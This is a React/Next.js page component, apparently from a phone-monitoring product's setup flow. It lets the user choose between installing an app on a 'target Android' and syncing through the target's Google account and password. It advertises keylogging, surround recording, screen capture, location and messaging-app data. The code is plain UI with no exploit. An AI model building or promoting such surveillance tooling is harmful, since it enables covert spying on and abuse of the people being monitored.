import Image from 'next/image'
import React, { useEffect, useState } from 'react'
import { Icon } from '@iconify/react'
import { useRouter } from 'next/router'
import { useTranslation } from 'src/utils/i18n'
import { styled } from '@mui/material'
import Backdrop from '@mui/material/Backdrop'
import { localPhoneSendEmailandroid } from 'src/@api/android'
import Start from 'src/components/googleCloudStep/Start'
import { getNotBindOrder } from 'src/@api/login.js'
import { appendSetupQuery, guardAppSetupOrderId } from 'src/utils/resolveCurrentOrderId'
import { redirectIfShouldBuyPackage } from 'src/utils/chooseDeviceRedirect'

const HrComponent = styled('div')(({
  '&::before': {
    content: '""',
    flex: 1,
    borderTop: '1px solid #D3D6DE',
    marginRight: '6px'
  },
  '&::after': {
    content: '""',
    flex: 1,
    borderTop: '1px solid #D3D6DE',
    marginLeft: '6px'
  }
}))

function Index() {
  const [isOpen, setIsOpen] = useState(false)
  const [isOpen2, setIsOpen2] = useState(false)
  const [setupBlocked, setSetupBlocked] = useState(true)

  const router = useRouter()
  const { t, locale } = useTranslation('commonAndroid')

  //弹窗
  const [modalOpen, setModalOpen] = useState(false)
  const [currentItem, setCurrentItem] = useState('First')

  useEffect(() => {
    if (modalOpen) {
      setTimeout(() => {
        setModalOpen(false)
      }, 3000)
    }
  }, [modalOpen])

  // 发送邮箱
  const sendEmail = async () => {
    try {
      //获取用户邮箱
      const email = JSON.parse(localStorage.getItem('userData'))?.data.email

      // 调用发邮件接口(code:0 成功)
      await localPhoneSendEmailandroid({ email })

      // 触发发送邮件事件
      dataLayer.push({
        event: 'sned-guide-email'
      })
    } catch (e) {
      console.log('send Email RunTimeExection Error', e)
    }
  }

  // 上报
  const bindTracking = async () => {
  }

  const fetchData = async () => {
  }

  useEffect(() => {
    bindTracking()
    fetchData()
  }, [])

  useEffect(() => {
    const guard = guardAppSetupOrderId(window.location.search)
    if (guard.blocked) {
      setSetupBlocked(true)

      return
    }
    setSetupBlocked(false)

    if (guard.orderId) return

    const init = async () => {
      const result = await getNotBindOrder()
      await redirectIfShouldBuyPackage(result)
    }
    init()
  }, [])

  if (setupBlocked) return null

  return (
    <>
      {currentItem === 'First' ?
        <div
          className={`bg-[#fff] Sixmd:px-[24px]  Sixmds:rounded-[10px] ${!isOpen && !isOpen2 ? 'h-[88vh] Local-step' : 'h-full'
            } ${isOpen && isOpen2 && 'h-full'}`}
        >
          <div className='pt-[40px] xs:pt-[10px] pb-[60px] xs:pb-[36px]'>
            <p className='text-center mt-[20px] text-[24px] leading-[36px] font-[600] px-2 w-full mx-auto'>
              {t('Choose the most suitable way to connect the target Android')}
            </p>
          </div>
          <div className='flex items-center justify-center smj:flex-col smj:pb-[95px]'>
            <button className={`w-[380px] smj:w-full h-full border-[1px] border-[#4A77FE] rounded-[12px] p-4 bg-[#F7FAFF99] hover:bg-[linear-gradient(179.88deg,_#F1E7FF_0.09%,_#CFD7FB_99.88%)] relative text-start`}
              onClick={() => {
                dataLayer.push({
                  event: 'androidtype',
                  value: 'android-app'
                })
                localStorage.setItem('currentMode', 'Android-Local')
                router.push(appendSetupQuery('/android/local/setup'))
              }}>
              <div className='absolute top-[-16px] right-[-3px] h-[33px] px-5 rounded-[4px] font-[600] text-[14px] leading-[33px] text-white bg-[linear-gradient(270deg,_#596BF3_0%,_#259CFF_100%)]'>
                {t('Recommended')}
              </div>
              <div className='flex items-center'>
                <div className='w-[48px] h-[48px] xs:w-[40px] rounded-full flex items-center justify-center flex-shrink-0'>
                  <Image alt='ellipse3' width={48} height={48} src='/images/android/ellipse3.png' />
                  <Image alt='app' width={100} height={100} src='/images/android/app.svg' className='w-[18px] xs:w-[22px] h-[25px] absolute' />
                </div>
                <p className='ml-3 font-[600] text-[18px] text-[#222222]'>
                  {t('Install app on target phone')}
                </p>
              </div>
              <p className='mt-3 mb-[2px] font-[600] text-[15px] leading-[24px] text-[#282938]'>{t('What you need')}</p>
              <p className='text-[12px] leading-[20px] text-[#484B60]'>{t('Target device')}</p>
              <p className='mt-[10px] mb-[2px] font-[600] text-[15px] leading-[24px] text-[#282938]'>{t('Estimated time')}</p>
              <p className='text-[12px] leading-[20px] text-[#484B60]'>{t('15 minutes 10 minutes in the target device')}</p>
              <p className='mt-[10px] mb-[4px] font-[600] text-[15px] leading-[24px] text-[#282938]'>{t('Available data')}</p>
              <p className='text-[12px] leading-[20px] font-[600] text-[#484B60]'>{t('General features')}</p>
              <div className={`${isOpen || 'smj:hidden'}`}>
                <div className='grid grid-cols-2'>
                  <ul className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px]'>
                    <li className='pt-1 list-disc'>{t('GPS location')}</li>
                    <li className='pt-1 list-disc'>{t('Call Logs')}</li>
                    <li className='pt-1 list-disc'>{t('Photos Videos')}</li>
                    <li className='pt-1 list-disc'>{t('Wi-Fi Networks')}</li>
                    <li className='pt-1 list-disc'>{t('Calendar')}</li>
                    <li className='pt-1 list-disc'>{t('Contact')}</li>
                    <li className='pt-1 list-disc'>{t('Installed Apps')}</li>
                    <li className='pt-1 list-disc'>{t('Email')}</li>
                  </ul>
                  <ul className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px]'>
                    <li className='pt-1 list-disc'>{t('Browser History')}</li>
                    <li className='pt-1 list-disc'>{t('Keylogger')}</li>
                    <li className='pt-1 list-disc'>{t('Keyword Alerts')}</li>
                    <li className='pt-1 list-disc'>{t('Screen Recording')}</li>
                    <li className='pt-1 list-disc'>{t('Surround Recording')}</li>
                    <li className='pt-1 list-disc'>{t('Screenshot')}</li>
                    <li className='pt-1 list-disc'>{t('Block Apps')}</li>
                    <li className='pt-1 list-disc'>{t('Block Wi-Fi')}</li>
                  </ul>
                </div>
                <p className='text-[12px] leading-[20px] font-[600] text-[#484B60] mt-[10px]'>{t('Social networks')}</p>
                <div className='grid grid-cols-2'>
                  <ul className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px]'>
                    <li className='pt-1 list-disc'>WhatsApp</li>
                    <li className='pt-1 list-disc'>LINE</li>
                    <li className='pt-1 list-disc'>Messenger</li>
                    <li className='pt-1 list-disc'>Telegram</li>
                    <li className='pt-1 list-disc'>Viber</li>
                    <li className='pt-1 list-disc'>Tinder</li>
                    <li className='pt-1 list-disc'>TikTok</li>
                  </ul>
                  <ul className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px]'>
                    <li className='pt-1 list-disc'>Kik</li>
                    <li className='pt-1 list-disc'>Snapchat</li>
                    <li className='pt-1 list-disc'>Teams</li>
                    <li className='pt-1 list-disc'>QQ</li>
                    <li className='pt-1 list-disc'>WeChat</li>
                    <li className='pt-1 list-disc'>Instagram</li>
                  </ul>
                </div>
              </div>
              <div className={`smjs:hidden ${isOpen && 'smj:hidden'} grid grid-cols-2`}>
                <li className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px] pt-1'>{t('GPS location')}</li>
                <li className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px] pt-1'>{t('Browser History')}</li>
              </div>
              <div className='mt-1 font-[600] text-[14px] leading-[22px] text-[#4A77FE] smjs:hidden'
                onClick={(e) => {
                  e.preventDefault()
                  e.stopPropagation()
                  setIsOpen(!isOpen)
                }}>
                {isOpen ? t('Hide details') : t('View more')}
              </div>
            </button>
            <button className={`w-[380px] smj:w-full smjs:h-[-webkit-fill-available] smj:h-full border-[1px] smjs:ml-10 smj:mt-6 border-[#4A77FE] rounded-[12px] p-4 bg-[#F7FAFF99] hover:bg-[linear-gradient(179.88deg,_#F1E7FF_0.09%,_#CFD7FB_99.88%)] text-start flex flex-col items-start`}
              onClick={() => {
                dataLayer.push({
                  event: 'androidtype',
                  value: 'android-cloud'
                })
                localStorage.setItem('currentMode', 'Android-Cloud')
                setCurrentItem('Start')
              }}>
              <div className='flex items-center'>
                <div className='w-[48px] h-[48px] xs:w-[40px] rounded-full flex items-center justify-center flex-shrink-0'>
                  <Image alt='ellipse' width={48} height={48} src='/images/android/ellipse.png' />
                  <Image alt='icloud' width={100} height={100} src='/images/android/icloud.svg' className='w-[26px] xs:w-[22px] h-[18px] absolute' />
                </div>
                <p className='ml-3 font-[600] text-[18px] text-[#222222]'>
                  {t('Use Google account sync')}
                </p>
              </div>
              <p className='mt-3 mb-[2px] font-[600] text-[15px] leading-[24px] text-[#282938]'>{t('What you need')}</p>
              <p className='text-[12px] leading-[20px] text-[#484B60]'>{t('Google account and password of the target device')}</p>
              <p className='mt-[10px] mb-[2px] font-[600] text-[15px] leading-[24px] text-[#282938]'>{t('Estimated time')}</p>
              <p className='text-[12px] leading-[20px] text-[#484B60]'>{t('2 minutes')}</p>
              <p className='mt-[10px] mb-[4px] font-[600] text-[15px] leading-[24px] text-[#282938]'>{t('Available data')}</p>
              <div className={`grid grid-cols-2 ${isOpen2 || 'smj:hidden'} w-full`}>
                <ul className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px]'>
                  <li className='pt-1 list-disc'>{t('Text Message')}</li>
                  <li className='pt-1 list-disc'>{t('GPS Location')}</li>
                  <li className='pt-1 list-disc'>{t('WhatsApp')}</li>
                  <li className='pt-1 list-disc'>{t('Photo')}</li>
                  <li className='pt-1 list-disc'>{t('Video')}</li>
                  <li className='pt-1 list-disc'>{t('Keep')}</li>
                </ul>
                <ul className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px]'>
                  <li className='pt-1 list-disc'>{t('Email')}</li>
                  <li className='pt-1 list-disc'>{t('Contact')}</li>
                  <li className='pt-1 list-disc'>{t('Browser History')}</li>
                  <li className='pt-1 list-disc'>{t('Browser Bookmark')}</li>
                  <li className='pt-1 list-disc'>{t('Wi-Fi Networks')}</li>
                </ul>
              </div>
              <div className={`smjs:hidden ${isOpen2 && 'smj:hidden'} grid grid-cols-2 w-full`}>
                <li className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px] pt-1'>{t('Text Message')}</li>
                <li className='list-disc text-[#484B60] ml-[16px] text-[12px] leading-[20px] pt-1'>{t('Email')}</li>
              </div>
              <div className='mt-1 font-[600] text-[14px] leading-[22px] text-[#4A77FE] smjs:hidden'
                onClick={(e) => {
                  e.preventDefault()
                  e.stopPropagation()
                  setIsOpen2(!isOpen2)
                }}>
                {isOpen2 ? t('Hide details') : t('View more')}
              </div>
            </button>
          </div>

          {/* 新增发邮件 */}
          {/* <div className='w-full flex justify-center'>
          <div className='w-[430px] xs:w-[96%] pt-[30px] pb-[42px]'>
            <span className='text-[16px] text-[#000000] font-[Poppins] font-[400] leading-[21px]'>{t('Tips')}</span>
            <ul className='text-[14px] text-[#2405F2] font-[Poppins] font-[400] leading-[21px]'>
              <li className='text-[#2405F2] flex items-center'>
                <div className='min-w-[4px] min-h-[4px] bg-[#9A9A9E] mr-[4px] rounded-[50%]'></div>
                <p
                  onClick={() => {
                    sendEmail()
                    setModalOpen(true)
                  }}
                  className='cursor-pointer'
                >{t('Cant get target phone or google account')}</p>
              </li>
            </ul>
          </div>
          </div> */}

          <Backdrop sx={{ color: '#fff', zIndex: theme => theme.zIndex.drawer + 1 }} open={modalOpen}>
            <div className='flex items-center justify-center'>
              {modalOpen && (
                <div className='w-[92%] fixed top-1/2 left-1/2 max-w-[420px] xs:max-w-[360px] transform -translate-x-1/2 -translate-y-1/2 bg-white shadow-4xl rounded-md'>
                  <button onClick={() => setModalOpen(false)} className='flex justify-end absolute right-2 top-2'>
                    <Icon icon='maki:cross' className='text-black/20 w-[20px] h-[20px]' />
                  </button>
                  <div className='px-4 py-8 flex items-center justify-start'>
                    <p className='ml-[10px] text-black text-left w-[90%]' dangerouslySetInnerHTML={{ __html: t('A guidance email has been sent to your mailbox If not received it please check in spam or click again') }}></p>
                  </div>
                </div>
              )}
            </div>
          </Backdrop>

          {/* 返回按钮 */}
          <div className="w-full mx-auto fixed bottom-0 smjs:left-[150px] smj:left-0 right-0 bg-white border-t border-[#E5E7EB]">
            <div className='flex justify-center w-full p-5 Mlg:px-0 bg-white mx-auto'>
              <div className='w-full lg:w-[620px] flex justify-between smj:px-4'>
                <button onClick={() => { router.push(appendSetupQuery('/setup')) }}
                  className='border-[1px] border-[#454CFF] bg-white rounded-[24px] h-[35px] flex items-center pl-[10px] pr-[19px]'>
                  <Image className='mr-[7px]' src='/images/bind/bind-arrow-blue.svg' width={18} height={18} alt='back' />
                  <span className='text-[15px] text-[#454CFF] font-[600]'>{t('BACK')}</span>
                </button>
              </div>
            </div>
          </div>
        </div >
        :
        <Start setCurrentItem={setCurrentItem} />
      }
    </>
  )
}

export default Index